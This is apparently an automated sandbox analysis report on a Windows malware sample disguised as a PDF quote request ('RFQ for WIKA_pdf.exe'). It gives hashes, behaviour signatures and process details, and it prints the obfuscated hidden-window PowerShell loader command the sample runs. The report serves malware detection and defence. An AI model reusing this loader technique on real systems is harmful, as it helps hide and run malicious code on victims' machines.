Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 09:21
Static task
static1
Behavioral task
behavioral1
Sample
RFQ for WIKA_pdf.exe
Resource
win7-20241023-en
General
-
Target
RFQ for WIKA_pdf.exe
-
Size
643KB
-
MD5
0292cf3982c9b1a9fab696af01ba5b16
-
SHA1
cc9d0d3e5b2ab552a627b2c506c7bdc0706e100e
-
SHA256
f32af695424c19ad7ba48fc23dee2d20cbf4263103e35309199890eeadc017d8
-
SHA512
1e4364b00ae0f3dde146a4724f175ea47af1ecafd34c57cbf8140d2aaa4e50a40a6b9693d7a8b7163d291c2f6b51fa1a84f1c85e98d700accbc4281631fd917c
-
SSDEEP
12288:BnMDf3lusde5obg6dhvfUXZ2Kd1xiPueC+LC6D:mDf35YkHDqkPueC+26
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeRFQ for WIKA_pdf.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RFQ for WIKA_pdf.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2484 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
RFQ for WIKA_pdf.exedescription pid Process procid_target PID 2920 wrote to memory of 2484 2920 RFQ for WIKA_pdf.exe 30 PID 2920 wrote to memory of 2484 2920 RFQ for WIKA_pdf.exe 30 PID 2920 wrote to memory of 2484 2920 RFQ for WIKA_pdf.exe 30 PID 2920 wrote to memory of 2484 2920 RFQ for WIKA_pdf.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\RFQ for WIKA_pdf.exe"C:\Users\Admin\AppData\Local\Temp\RFQ for WIKA_pdf.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$enumeration=Get-Content -raw 'C:\Users\Admin\AppData\Local\Sonneteeress42\Nonusurpingly208\Reprsentantselskaberne.Bit';$Noret=$enumeration.SubString(7806,3);.$Noret($enumeration) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-